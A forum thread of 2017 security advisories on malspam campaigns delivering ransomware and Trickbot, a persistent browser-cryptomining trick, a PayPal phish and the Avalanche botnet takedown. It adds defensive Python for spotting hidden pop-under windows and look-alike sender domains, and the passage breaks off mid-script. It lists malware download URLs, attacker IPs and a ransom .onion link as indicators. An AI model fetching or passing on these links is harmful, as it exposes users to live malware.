cryptovoip .in 103.21.58.122 Probably a hacked compromised server not knowingly involved in hosting the malware payload...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d312c9226bc8558424c9fcc69d12c4b4e72a9dd67a961196b752bf231d9aa69d/analysis/1510851227/

** https://www.hybrid-analysis.com/sample/d312c9226bc8558424c9fcc69d12c4b4e72a9dd67a961196b752bf231d9aa69d?environmentId=100
DNS Requests
181.215.247.234
103.21.58.122
Contacted Hosts
103.21.58.122
201.174.233.241
181.215.247.234

3] https://www.virustotal.com/en/file/c62495a039a7973429e0d9181ae45eb231832026cd6bde1251ace42f6764ec68/analysis/1510899976/
DDF_outputCEAA78F[1].exe

4] https://www.hybrid-analysis.com/sample/c62495a039a7973429e0d9181ae45eb231832026cd6bde1251ace42f6764ec68?environmentId=100
DNS Requests
181.215.247.234
Contacted Hosts
201.174.233.241
181.215.247.234

digitalsearchengine .in: A temporary error occurred during the lookup...

cryptovoip .in: 103.21.58.122: https://www.virustotal.com/en/ip-address/103.21.58.122/information/
> https://www.virustotal.com/en/url/23dff62bba1329ede8b853a6961ccca03327c9e871100f58a5dc102ebfad702a/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-11-23, 15:31
FYI...

Fake 'scanned from' SPAM - delivers Ransomware
- https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/
23 Nov 2017 - "... It is almost as if they have timed the new version to spam out on Thanksgiving day in USA, where the AV companies and security teams are off on their long weekend holiday... downloaders from the Necurs botnet... an email with the subject of 'scanned from (printer or scanner name)' pretending to come from copier@ your own email address or company domain... definitely ransomware but doesn’t look like Locky. The ransom note is very different. These all have -blank- email bodies with just an attachment and the subject...
Update I am being told it is Scarab Ransomware... The new ransom note is called 'IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT'... The subjects in this vary but are all copier or scanner related:
Scanned from Lexmark
Scanned from HP
Scanned from Canon
Scanned from Epson

P_rek.zip: Extracts to: image2017-11-22-5864621.vbs - Current Virus total detections 4/57*. Hybrid Analysis**
| Anyrun Beta[3] | Joesecurity[4] |
This downloads from (in this example, there will be -dozens- of other download sites)
http ://pamplonarecados .com/JHgd476? (VirusTotal 8/66[5])
One of the emails looks like:
From: copier@ victimsdomain .com
Date: Thu 23/11/2017 06:28
Subject: Scanned from HP
Attachment: image2017-11-23-4360760.7z
Body content:

EMPTY

The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e6715117fd6995fafe48a3a60a2b1275ef21a63f7878de2cc031c8f1a0e5d771/analysis/1511423196/
image2017-11-22-5864621.vbs

** https://www.hybrid-analysis.com/sample/e6715117fd6995fafe48a3a60a2b1275ef21a63f7878de2cc031c8f1a0e5d771?environmentId=100
DNS Requests
5.2.88.79
88.99.66.31
Contacted Hosts
5.2.88.79
88.99.66.31

3] https://app.any.run/tasks/839d4f49-13ab-4bcb-a8c6-8aead1ea33a8

4] https://jbxcloud.joesecurity.org/analysis/445266/1/html

5] https://www.virustotal.com/en/file/41ca1baf59e457aa07b29f3f7033350d6c3aed3c397aa28128ed05a27e1eb6ac/analysis/1511422910/
JHgd476

pamplonarecados .com: 5.2.88.79: https://www.virustotal.com/en/ip-address/5.2.88.79/information/
> https://www.virustotal.com/en/url/231a8217a6cd8900827411d4e3984979acea9a1441de76e9576eb603b49f655f/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-11-30, 15:42
FYI...

Fake 'Invoice' SPAM - delivers ransomware
- https://myonlinesecurity.co.uk/necurs-botnet-malspamming-globeimposter-ransomware-via-fake-invoices/
30 Nov 2017 - "... from the Necurs botnet... an email with an -empty- body with the subject of 'FL-610025 11.30.2017' (random numbers) pretending to come from 'Invoicing' @ random email addresses. Today it is Globeimposter -not- Locky ransomware being delivered via this malspam campaign from the Necurs botnet...
One of the emails looks like:
From: Invoicing <Invoicing@random company >
Date: Thu 30/11/2017 09:18
Subject: FL-610025 11.30.2017
Attachment: FL-610025 11.30.2017.7z

Body content: Completely empty

FL-610025 11.30.2017.7z: Extracts to: FL-432927.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...
Downloads from
http ://datenhaus .info/JHGcd476334? (as usual there will be dozens of different download sites) (VirusTotal 10/66[3])... Other download sites that I have been notified about:
mh-service .ru/JHGcd476334?
awholeblueworld .com/JHGcd476334?
... The ransom payment link is to
http ://n224ezvhg4sgyamb .onion/sup .php where you see a pretty bland page giving this link to make enquiries... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bdbc8b31f44e8041dbd2e3eb579aeea61d35e1db95c339ddf67eca8549ea9d53/analysis/1512033616/
FL-432927.vbs

** https://www.hybrid-analysis.com/sample/bdbc8b31f44e8041dbd2e3eb579aeea61d35e1db95c339ddf67eca8549ea9d53?environmentId=100
DNS Requests
85.214.205.231
Contacted Hosts
85.214.205.231

3] https://www.virustotal.com/en/file/7bc1c0b67e76b761128ffc478554858a09aa6e5fbb7e57f1f58b3066f6c228fc/analysis/1512033503/
d4ddf8bf.exe

datenhaus .info: 85.214.205.231: https://www.virustotal.com/en/ip-address/85.214.205.231/information/
> https://www.virustotal.com/en/url/1b0845e23f71a3ff58494375bd5e7de334d405f72fc431fbfefb84a14913abcf/analysis/

mh-service .ru: 89.253.235.118: https://www.virustotal.com/en/ip-address/89.253.235.118/information/
> https://www.virustotal.com/en/url/fa9f6060289635707862505fdd206a19f0998334e48152de337e7db4e6d9725b/analysis/

awholeblueworld .com: 66.36.173.215: https://www.virustotal.com/en/ip-address/66.36.173.215/information/
> https://www.virustotal.com/en/url/76bde6cbbaa7773beb1b15ebbe5fe618fa99a7ce520c76dd392a6e1eb50f30eb/analysis/
___

Persistent drive-by cryptomining...
- https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/
Nov 29, 2017 - "... we are witnessing more and more cases of abuse involving the infamous 'Coinhive' service that allows websites to use their visitors to mine the Monero cryptocurrency. Servers continue to get hacked with mining code, and plugins get hijacked and affect hundreds or even thousands of sites at once... we have come across a technique that allows dubious website owners or attackers that have compromised sites to keep mining for Monero even after the browser window is closed. Our tests were conducted using the latest version of the Google Chrome browser. Results may vary with other browsers. What we observed was the following:
A user visits a website, which silently loads cryptomining code.
CPU activity rises but is not maxed out.
The user leaves the site and closes the Chrome window.
CPU activity remains higher than normal as cryptomining continues:
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/hidden_mining.gif
The trick is that although the visible browser windows are closed, there is a hidden one that remains open. This is due to a 'pop-under' which is sized to fit right under the taskbar and hides behind the clock. The hidden window’s coordinates will vary based on each user’s screen resolution... If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up:
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/os_compare.png
... Mitigation: This type of 'pop-under' is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself. Closing the browser using the “X” is no longer sufficient. The more technical users will want to run Task Manager* to ensure there are no remnant browser processes still running and terminate them.
* https://www.howtogeek.com/66622/stupid-geek-tricks-6-ways-to-open-windows-task-manager/
Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running:
> https://blog.malwarebytes.com/wp-content/uploads/2017/11/win7_mitigation.png

> https://blog.malwarebytes.com/wp-content/uploads/2017/11/win10_mitigation.png
... Nearly two months since Coinhive’s inception, browser-based cryptomining remains highly popular, but for all the wrong reasons. Forced mining (no opt-in) is a bad practice, and any tricks like the one detailed in this blog are only going to erode any confidence some might have had in mining as an ad replacement. History shows us that trying to get rid of ads failed before, but only time will tell if this will be any different.
Unscrupulous website owners and miscreants alike will no doubt continue to seek ways to deliver drive-by mining, and users will try to fight back by downloading more adblockers, extensions, and other tools to protect themselves. If malvertising wasn’t bad enough as is, now it has a new weapon that works on all platforms and browsers."
Indicators of compromise:
145.239.64.86,yourporn[.]sexy,Adult site
54.239.168.149,elthamely[.]com,Ad Maven popunder
52.85.182.32,d3iz6lralvg77g[.]cloudfront.net,Advertiser's launchpad
54.209.216.237,hatevery[.]info,Cryptomining site

- https://centralops.net/co/DomainDossier.aspx
hatevery .info
52.72.157.243
54.156.6.169
52.200.89.230
52.54.161.204
54.84.183.12
34.237.128.64 ...
'Fast Flux' network: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/

- https://www.helpnetsecurity.com/2017/11/30/browser-cryptomining-close-window/
Nov 30, 2017

:fear::fear: :mad:
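The Malwarebytes write-up above says the rogue window is sized to sit under the taskbar and that its coordinates depend on the user's screen resolution, so the check that generalises "resize the taskbar and see what pops up" is: enumerate the visible browser windows and flag any whose rectangle lies entirely outside the work area (the desktop minus the taskbar). The block below is an added example for this thread, not code from the Malwarebytes post. The browser title fragments and the Win32 calls it uses are assumptions made for the example; the geometry part runs on constructed rectangles on any OS, and the live enumeration only runs on Windows.

```python
"""Find browser windows parked outside the usable desktop, e.g. under the taskbar.

Added example for this thread (not code from the Malwarebytes post).  The geometry
check is plain Python and runs anywhere on constructed data; the Win32 enumeration
at the bottom is only reached on Windows.
"""
import ctypes
import sys
from dataclasses import dataclass

# Window-title fragments used to pick out browser top-level windows (assumption:
# these are the default title suffixes of the common browsers on Windows).
BROWSER_TITLE_HINTS = ("Google Chrome", "Mozilla Firefox", "Microsoft Edge", "Opera")


@dataclass(frozen=True)
class Rect:
    left: int
    top: int
    right: int
    bottom: int

    def intersects(self, other: "Rect") -> bool:
        """True if the two rectangles share any area (edges merely touching does not count)."""
        return not (self.right <= other.left or self.left >= other.right
                    or self.bottom <= other.top or self.top >= other.bottom)


@dataclass(frozen=True)
class Window:
    title: str
    rect: Rect


def is_browser_window(title: str) -> bool:
    return any(hint in title for hint in BROWSER_TITLE_HINTS)


def hidden_windows(windows, work_area: Rect):
    """Return browser windows that lie wholly outside the work area.

    The work area is the desktop minus the taskbar, so a pop-under sized and
    positioned "under the taskbar" is on the monitor yet never intersects it.
    """
    return [w for w in windows
            if is_browser_window(w.title) and not w.rect.intersects(work_area)]


def win32_work_area() -> Rect:
    """SPI_GETWORKAREA: the primary monitor's desktop area excluding the taskbar."""
    import ctypes.wintypes as wt
    rect = wt.RECT()
    SPI_GETWORKAREA = 0x0030
    ctypes.windll.user32.SystemParametersInfoW(SPI_GETWORKAREA, 0, ctypes.byref(rect), 0)
    return Rect(rect.left, rect.top, rect.right, rect.bottom)


def win32_visible_windows():
    """Enumerate visible top-level windows with their titles and screen rectangles."""
    import ctypes.wintypes as wt
    user32 = ctypes.windll.user32
    found = []

    @ctypes.WINFUNCTYPE(ctypes.c_bool, wt.HWND, wt.LPARAM)
    def on_window(hwnd, _lparam):
        if user32.IsWindowVisible(hwnd):
            length = user32.GetWindowTextLengthW(hwnd)
            buf = ctypes.create_unicode_buffer(length + 1)
            user32.GetWindowTextW(hwnd, buf, length + 1)
            rect = wt.RECT()
            user32.GetWindowRect(hwnd, ctypes.byref(rect))
            found.append(Window(buf.value, Rect(rect.left, rect.top, rect.right, rect.bottom)))
        return True  # keep enumerating

    user32.EnumWindows(on_window, 0)
    return found


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("Live enumeration needs Windows; the geometry check is usable anywhere.")
    for w in hidden_windows(win32_visible_windows(), win32_work_area()):
        print(f"suspicious hidden browser window: {w.title!r} at {w.rect}")
```

A window on a second monitor with negative coordinates would also fall outside the primary work area, so on multi-monitor machines compare against every monitor's work area (EnumDisplayMonitors) before treating a hit as a hidden pop-under. Killing the process from Task Manager, as the article says, remains the fix; this just tells you which window to look for.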

AplusWebMaster
2017-12-01, 14:16
FYI...

Fake 'Visa notification' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-visa-notification-with-password-protected-word-doc-delivers-malware/
1 Dec 2017 - "An email with the subject of Fwd:... (recipient’s name) pretending to come from Pamela <logo@ mensperl .edu> (probably random senders) with a malicious word doc attachment...
Update: I am reliably informed that it is Sigma ransomware[1] which appears to only run on a real computer, not a VM or Sandbox...
1] https://twitter.com/pcrisk/status/936534360148402176

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/visa_scan_doc.png

derek_scan.doc - Current Virus total detections 0/60*... Hybrid Analysis** (I forgot to try to insert password in the settings)
Word doc with password removed (VirusTotal 23/61***) (Hybrid Analysis[4]). This malware downloads from
http ://ypg7rfjvfywj7jhp .onion.link/icon.jpg -renamed- to svchost.exe by-the-macro on download
(VirusTotal 24/67[5]) (Hybrid Analysis[6])...
Word doc when first opened looks like this and you need to insert the password from the email body:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/Visa_scan_doc_pw_needed.png
Word doc after inserting password, telling you to enable editing & content:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/Visa_scan_doc_enable.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... Do NOT enable Macros or editing under any circumstances... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/be3852eea1c2de1a9dd6dbbd6de9fe8330413989211f2e466b2b1c4d4c87a02b/analysis/1512109411/

** https://www.hybrid-analysis.com/sample/be3852eea1c2de1a9dd6dbbd6de9fe8330413989211f2e466b2b1c4d4c87a02b?environmentId=100

*** https://www.virustotal.com/en/file/ec9d519ea6c683f8813af50db2135a51bab17afd610095464ad7fda1cf836ae7/analysis/1512110582/

4] https://www.hybrid-analysis.com/sample/6f73b98463f02cefe7d6d96d56c8d8d8acd5e3b1e1b43e8f1b25b153f97aa24c?environmentId=100
DNS Requests
94.130.28.200
185.194.141.58
Contacted Hosts
185.194.141.58
94.130.28.200
163.172.176.167
199.254.238.52
5.39.92.199
159.203.15.100
87.118.112.63
165.227.135.224
93.115.95.38

5] https://www.virustotal.com/en/file/6f73b98463f02cefe7d6d96d56c8d8d8acd5e3b1e1b43e8f1b25b153f97aa24c/analysis/
icon.jpg

6] https://www.hybrid-analysis.com/sample/6f73b98463f02cefe7d6d96d56c8d8d8acd5e3b1e1b43e8f1b25b153f97aa24c?environmentId=100
DNS Requests
94.130.28.200
185.194.141.58
Contacted Hosts
185.194.141.58
94.130.28.200
163.172.176.167
199.254.238.52
5.39.92.199
159.203.15.100
87.118.112.63
165.227.135.224
93.115.95.38
___

Fake 'invoice' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/necurs-trying-to-deliver-globeimposter-ransomware-via-fake-invoices-with-broken-attachments/
1 Dec 2017 - "... from the Necurs botnet... an email with the subject of '12_Invoice_6856' (random numbers) coming from random email addresses... The bland email has what pretends to be a word doc attachment. It is NOT a word doc but a wrongly named .7z (zip) file. If you rename the 001_0343.doc to 001_0343.doc.7z it can be easily extracted to give a working vbs file...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/12_invoice_6856_email.png

001_0343.doc.7z: Extracts to: I912798654581.vbs - Current Virus total detections 9/60*. Hybrid Analysis**...

This particular example downloads from (there will be several others)
http ://pdj .co .id/UYTd46732? (VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9fa4ec5ad4ed0ed56e18d3e066f122637d980942661ca867dd52102cee73c8a0/analysis/1512125181/
I912798654581.vbs

** https://www.hybrid-analysis.com/sample/9fa4ec5ad4ed0ed56e18d3e066f122637d980942661ca867dd52102cee73c8a0?environmentId=100
DNS Requests
202.169.44.166
Contacted Hosts
202.169.44.166
88.99.66.31

3] https://www.virustotal.com/en/file/e2209f339b2e5afbb40d4f3dfddf4939ffdb9accbb5253121707a5b1cde15dd2/analysis/1512125396/
UYTd46732.exe

pdj .co .id: 202.169.44.166: https://www.virustotal.com/en/ip-address/202.169.44.166/information/
> https://www.virustotal.com/en/url/785c62c79e40a59e1ed35c05025f5187cdc343ba9e51fe60d24071dc4cc44742/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-12-04, 15:22
FYI...

'Avalanche' takedown - with 'Andromeda'
- http://blog.shadowserver.org/2017/12/04/avalanche-year-two-this-time-with-andromeda/
Dec 4, 2017 - "On December 1st last year, the successful takedown* of the long-running criminal Avalanche double fast-flux-platform was announced by a consortium of international public and private partners, including The Shadowserver Foundation. This unprecedentedly complex operation was the culmination of over four-years of law enforcement and technical work, and impacted over twenty different malware families that utilized over 832,000 different DNS domains for Domain Generation Algorithms (DGAs) in -60- top level domains. Sinkhole data from the Avalanche platform is available each day in Shadowserver’s free of charge daily reports to national CERTs and network owners... with many victim computers still to be disinfected (you can find tools for disinfection here[1])...
* http://blog.shadowserver.org/2016/12/01/avalanche/
...
1] https://avalanche.shadowserver.org/
... On 29 November 2017, the Federal Bureau of Investigation (FBI), in close cooperation with the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust and private-sector partners The Shadowserver Foundation, Microsoft, The Registrar of Last Resort, Internet Corporation for Assigned Names and Numbers (ICANN) and associated domain registries, Fraunhofer Institute for Communication, Information Processing and Ergonomics (FKIE), and the German Federal Office for Information Security (BSI), as well as law enforcement representatives from Australia, Austria, Belarus, Belgium, Canada, Finland, France, Italy, Montenegro, Netherlands, Poland, Singapore, Spain, the United Kingdom and Taiwan, announced** that they had dismantled one of the longest running malware families in existence – Andromeda (also known as Gamarue). At the same time, they also continued their existing legal and technical actions against over 848,000 Avalanche related command and control (C2) domains, to continue to protect existing victims and provide more time for any remaining victims to be identified and remediated...
** https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation
... They successfully extended and expanded sinkholing of the -21- malware families that made use of the Avalanche platform, and the associated takedown of the -Andromeda-botnet- is another great example of how complex international operations can successfully be jointly executed by a combination of cross-disciplinary public and private partners in the ongoing fight against cyber criminals globally."
(More detail at the URL at the top.)

> https://avalanche.shadowserver.org/stats/

> http://blog.shadowserver.org/wp-content/uploads/2017/12/Avalanche-Andromeda-map.png

> https://www.justice.gov/opa/pr/joint-statement-dismantling-international-cyber-criminal-infrastructure-known-avalanche
Dec 1, 2017 - "... The operation involves arrests and searches in five countries. More than -50- Avalanche servers worldwide were taken offline..."
Press Release Number: 16-1409
___

PayPal phish - 'verify transactions'
- https://blog.malwarebytes.com/cybercrime/2017/12/paypal-phish-asks-to-verify-transactions-dont-do-it/
Dec 1, 2017 - "There’s a number of -fake- PayPal emails going around right now claiming that a 'recent transaction can’t be verified'... Here’s two examples of how these mails are being named from one of our mailboxes:
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/paypal-phish-mails.jpg
Here’s the most recent email in question:
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/paypal-phish-mail.jpg
Clicking the button takes potential victims to a -fake- PayPal landing page, which tries very hard to direct them to a “resolution center”:
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/fake-paypal-landing-page.jpg
The URL is:
myaccounts-webapps-verify-updated-informations(dot)epauypal(dot)com/myaccount/e6abe

epauypal(dot)com: A temporary error occurred during the lookup...

From here, it’s a quick jump to two pages that ask for the following slices of personal information and payment data:
1. Name, street address, city, state, zip, country, phone number, mother’s maiden name, and date of birth
2. Credit card information (name, number, expiration code, security code)
> https://blog.malwarebytes.com/wp-content/uploads/2017/12/paypal-phish-website-personal-info-request.jpg
... Whatever your particular spending circumstance, wean yourself away from clicking on -any- email-link where claims of payment or requests for personal information are concerned. Take a few seconds to manually navigate to the website in question, and log in directly instead. If there are any payment hiccups happening behind the scenes, you can sort things out from there. Scammers are banking on the holiday rush combined with the convenience of “click link, do thing” to steal cash out from under your nose..."

- https://www.helpnetsecurity.com/2017/12/04/paypal-holiday-phishing/
Dec 4, 2017
___

> https://www.databreaches.net/paypal-admits-acquired-company-suffered-major-breach/
Dec 4, 2017

> https://www.theregister.co.uk/2017/12/04/paypal_tio_data_breach/
Dec 4, 2017

> http://www.tio.com/
Dec 1, 2017

:fear::fear: :mad:

AplusWebMaster
2017-12-05, 12:38
FYI...

Fake 'Message' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/globeimposter-ransomware-continues-to-be-delivered-via-necurs-botnet-using-fake-scanner-or-printer-messages/
5 Dec 2017 - "... downloaders from the Necurs botnet... an email with the subject of 'Message from G10PR0378651 .victimsdomain .com' pretending to come from random names at your own email address or company domain... The attachment says it is a zip file but is actually a 7z file renamed to zip...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/message-from-G10PR0378651.png

201712054051.zip: Extracts to: MSC000000981631.vbs - Current Virus total detections 2/59*. Hybrid Analysis**...
This particular version downloads from
http ://rorymartin8 .info/hudgy356? (there will be dozens of others) (VirusTotal 4/56[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7a18bffd01eeab08a3f88d35ba5d09106690ea62d01e43d950b6b842ab6c4e76/analysis/1512468367/
MSC000000981631.vbs

** https://www.hybrid-analysis.com/sample/7a18bffd01eeab08a3f88d35ba5d09106690ea62d01e43d950b6b842ab6c4e76?environmentId=100
DNS Requests
192.185.193.214
Contacted Hosts
192.185.193.214

3] https://www.virustotal.com/en/file/c0ce6c2f03e3174d347eb2136a230883a725fcd5179221f61435ea709a2ba81f/analysis/1512468259/

rorymartin8 .info: 192.185.193.214: https://www.virustotal.com/en/ip-address/192.185.193.214/information/
> https://www.virustotal.com/en/url/7fa3bd7cc14ec19c942968a53ef8bc75ec706ee75dd7bec4f89d0a2f87976399/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-12-06, 13:11
FYI...

Fake 'documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-lloyds-bank-confidential-account-documents-malspam/
6 Dec 2017 - "... an email containing the subject of 'Confidential account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like or typo-squatted domain <secure@ lloyds-commercial .com > with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/lloyds-commercial_trickbot.png

Protected32.doc - Current Virus total detections 3/59*. Hybrid Analysis**...
This malware docx file downloads from
http ://undergroundis .com/images/logo.png which of course is -not- an image file but a renamed .exe file that gets renamed to Wkob.exe (VirusTotal 13/67***)... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/38de462234607711e55c4dca1f74bec77db5586330b1ccb09696e55257709212/analysis/1512558154/
Protected32.doc

** https://www.hybrid-analysis.com/sample/38de462234607711e55c4dca1f74bec77db5586330b1ccb09696e55257709212?environmentId=100
DNS Requests
216.239.36.21
192.254.225.208
Contacted Hosts
192.254.225.208
216.239.36.21
185.158.114.106
92.53.66.115

*** https://www.virustotal.com/en/file/294279f9b222dfb98f10d814717ac2f3bf9f683290723f272c4cff984e79a7a3/analysis/1512558724/

undergroundis .com: 192.254.225.208: https://www.virustotal.com/en/ip-address/192.254.225.208/information/
> https://www.virustotal.com/en/url/bfea78cd1065f0b94606e5a7c877a073ab9665fdec663d45f5cbeb2030c8f625/analysis/
___

Google update 'glitch' disconnects student Chromebooks in schools across the U.S.
- https://www.geekwire.com/2017/reported-google-update-glitch-disconnects-student-chromebooks-schools-across-u-s/
Dec 5, 2017 at 4:59 pm - "... Tens of thousands, perhaps millions, of Google Chromebooks, widely prized by schools due to their low cost and ease of configuration, were reported to be offline for several hours on Tuesday. The apparent cause? A seemingly -botched- WiFi policy update pushed out by Google that caused many Chromebooks to forget their approved network connection, leaving students disconnected.
Google first gave schools a heads-up via Twitter after the fact, indicating there was a fix.
'We're aware of a wifi connectivity outage that affected some Chromebooks today. The issue is resolved. To get your Chromebooks online: reboot & manually join a WiFi network or connect via ethernet to receive a policy update. Sorry for the disruption & thank you for your patience.
— Google For Education (@GoogleForEdu) December 5, 2017'
- https://twitter.com/GoogleForEdu/status/938159020082376704?ref_src=twsrc%5Etfw
That disclosure led to dismayed reaction by educators, some of whom had Chromebook installations in the thousands... GeekWire reached out to Google for more information about the cause and scope of the Chromebook issue, and will update this post if more details become available."

> https://cdn.geekwire.com/wp-content/uploads/2017/12/DownDetectorGoogle120517.png

Current Status: http://downdetector.com/status/google
'Google problems last 24 hours'

>> https://support.google.com/chrome/a/answer/7583402
Article last updated on Dec 6, 2017

:fear::fear: :mad:

AplusWebMaster
2017-12-07, 15:22
FYI...

Fake 'account documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-via-fake-companies-house-secure-form-malspam/
7 Dec 2017 - "... an email containing the subject of 'Your account documents' pretending to come from Companies House but actually coming from a look-a-like or typo-squatted domain <no-reply@ companieshouseform .co.uk> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/companies-house-secure-form.png

SecureForm84.doc - Current Virus total detections 3/60*| Hybrid Analysis**... This malware docx file downloads from
http ://aperhu .com/ser0712.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ejjmdejh9.exe (VirusTotal 8/68[3])...
The alternative download location is
http ://altarek .com/ser0712.png... Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services...
companieshouseform .co.uk hosted on numerous servers and IP addresses and sending the emails via 185.207.204.218 | 185.23.215.76 | 89.39.106.208 | All of which are based in the Netherlands...
Malware detail:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/companies-house-secure-form_word_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/2c258ffcf53a2bbf22356b58f2baff72ce01f1ca3c28a8c9e6e84b2d0848f588/analysis/1512651253/
SecureForm6.doc

** https://www.hybrid-analysis.com/sample/2c258ffcf53a2bbf22356b58f2baff72ce01f1ca3c28a8c9e6e84b2d0848f588?environmentId=100
DNS Requests
146.255.36.1
143.95.252.46
Contacted Hosts
143.95.252.46
146.255.36.1
185.80.128.223
82.146.47.221
185.125.46.161

3] https://www.virustotal.com/en/file/bb82bcef4bfcb5b06a6f8e2de74321468212feea31ec2f132fa842271f045071/analysis/1512647520/
fbwnk.exe

aperhu .com: 143.95.252.46: https://www.virustotal.com/en/ip-address/143.95.252.46/information/
> https://www.virustotal.com/en/url/8a56867ddc4787930a1e16508a833b92387f209c53a1a2c999666097f55001d0/analysis/

altarek .com: 64.50.184.217: https://www.virustotal.com/en/ip-address/64.50.184.217/information/
> https://www.virustotal.com/en/url/c11005bca59161744c41b6c7fa0ee774564d9bdea584e2bf3157af9eee2e50bb/analysis/

:fear::fear: :mad:
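Every bank, Companies House and PayPal lure quoted in these posts uses a look-alike registrable domain (barclaysdocuments .com, barclays-mail .co.uk, lloyds-commercial .com, companieshouseform .co.uk, epauypal .com). The block below is an added example, not code from myonlinesecurity or Malwarebytes: it refangs the "x .com" and "(dot)" notation used in this thread, extracts the registrable domain from a From address or URL, and reports whether that domain embeds a brand name, is a couple of edits away from one, or is the genuine domain (in which case only the SPF/DKIM/DMARC results in the headers can say whether the mail was really sent by it). The brand allow-list and the two-level suffix set are assumptions made for the example; a real deployment should use the Public Suffix List.

```python
"""Score sender domains against a list of brands they might be impersonating.

Added example for this thread, not code from the myonlinesecurity or Malwarebytes
posts.  BRANDS is an assumed allow-list for the example and TWO_LEVEL_SUFFIXES is a
tiny stand-in for the Public Suffix List; real deployments should use the real PSL.
"""
import re
from urllib.parse import urlsplit

BRANDS = {  # brand token -> registrable domains assumed genuine for this example
    "barclays": {"barclays.co.uk", "barclays.com"},
    "lloyds": {"lloydsbank.com", "lloydsbank.co.uk"},
    "companieshouse": {"companieshouse.gov.uk"},
    "paypal": {"paypal.com", "paypal.co.uk"},
    "amazon": {"amazon.com", "amazon.co.uk"},
}
TWO_LEVEL_SUFFIXES = {"co.uk", "org.uk", "gov.uk", "ac.uk", "co.id", "com.au"}
MAX_EDITS = 2   # edit-distance threshold for the typosquat test


def refang(value: str) -> str:
    """Undo the 'x .com', '(dot)' and '[.]' defanging used in the posts above."""
    value = re.sub(r"\s+", "", value)
    return value.replace("(dot)", ".").replace("[.]", ".").lower()


def host_from(value: str) -> str:
    """Accept a URL, an e-mail address or a bare host and return the host part."""
    value = refang(value)
    if "://" not in value and "/" in value:
        value = "http://" + value          # path without scheme, e.g. the PayPal phish URL
    if "://" in value:
        return urlsplit(value).hostname or ""
    if "@" in value:
        return value.rsplit("@", 1)[1]
    return value


def registrable_domain(host: str) -> str:
    labels = host.strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(value: str):
    """Return (verdict, brand) for a sender address, URL or domain."""
    reg = registrable_domain(host_from(value))
    core = reg.split(".")[0].replace("-", "")
    for brand, legit in BRANDS.items():
        if reg in legit:
            # The domain itself is genuine; only SPF/DKIM/DMARC results can say
            # whether this message really came from it (a forged From header will not).
            return "genuine-domain", brand
    for brand in BRANDS:
        if brand in core:
            return "lookalike", brand       # brand embedded: barclaysdocuments, lloyds-commercial
    for brand in BRANDS:
        if levenshtein(core, brand) <= MAX_EDITS:
            return "typosquat", brand       # a few edits away: epauypal
    return "unknown", None


if __name__ == "__main__":
    for sample in ("secure@ barclaysdocuments .com",
                   "no-reply@ companieshouseform .co.uk",
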